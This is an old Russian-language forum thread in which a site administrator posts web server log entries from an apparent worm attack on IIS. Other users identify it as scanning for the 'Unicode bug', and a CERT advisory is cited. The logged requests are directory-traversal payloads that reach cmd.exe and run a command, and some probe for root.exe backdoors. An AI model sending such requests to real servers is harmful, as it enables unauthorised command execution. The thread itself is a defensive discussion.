Легенда:
 новое сообщение
 закрытая нитка
 новое сообщение
 в закрытой нитке
 старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
опять атакуют IIS 18.09.01 23:09
Автор: ayc Статус: Незарегистрированный пользователь
|
Сегодня на нескольких наших сайтах (не связанных) половина запросов - попытки взлома и заражения IIS. В инете уже полно зараженных сайтов, показывающих readme.eml и ругаень в адрес правительства США. Что это за вирус? (непохоже чтобы вручную ломали)
reqs: file
----: ----
49: /scripts/..%255c../winnt/system32/cmd.exe
49: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
44: /scripts/..%5c../winnt/system32/cmd.exe
44: /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
34: /scripts/root.exe
34: /scripts/root.exe?/c+dir
31: /msadc/root.exe
31: /msadc/root.exe?/c+dir
27: /d/winnt/system32/cmd.exe
27: /d/winnt/system32/cmd.exe?/c+dir
27: /c/winnt/system32/cmd.exe
27: /c/winnt/system32/cmd.exe?/c+dir
23: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
23: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
23: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
23: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
22: /scripts/winnt/system32/cmd.exe
22: /scripts/winnt/system32/cmd.exe?/c+dir
22: /scripts/..%c1%9c../winnt/system32/cmd.exe
22: /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
22: /scripts/..%252f../winnt/system32/cmd.exe
22: /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
22: /scripts/..%c0%af../winnt/system32/cmd.exe
22: /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
22: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe
22: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
22: /scripts/..%c1%1c../winnt/system32/cmd.exe
22: /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
|
|
Apache то же атакуют ..... как IIS ;-) 20.09.01 16:53
Автор: Falcon Статус: Незарегистрированный пользователь
|
|
|
|
IMHO, это тебя так сканируют:) 19.09.01 09:44
Автор: йцукенг <jcukeng> Статус: Member
|
на предмет "Unicode bug"
пока только пытаются выполнить команду dir.
автоматически это делают или вручную, можно понять, посмотрев в логах на время запросов.
удачи,
йцукенг
|
| |
IMHO, это тебя так сканируют:) 19.09.01 11:31
Автор: ayc Статус: Незарегистрированный пользователь
|
> на предмет "Unicode bug"
> пока только пытаются выполнить команду dir.
> автоматически это делают или вручную, можно понять,
> посмотрев в логах на время запросов.
> удачи,
> йцукенг
Это все-таки проделки нового сетевого вируса.
http://www.cert.org/advisories/CA-2001-26.html
Думаю, и в своих логах вы тоже уже это обнаружите.
|
|
|
подробно о проекте
Анализ криптографических сетевых...
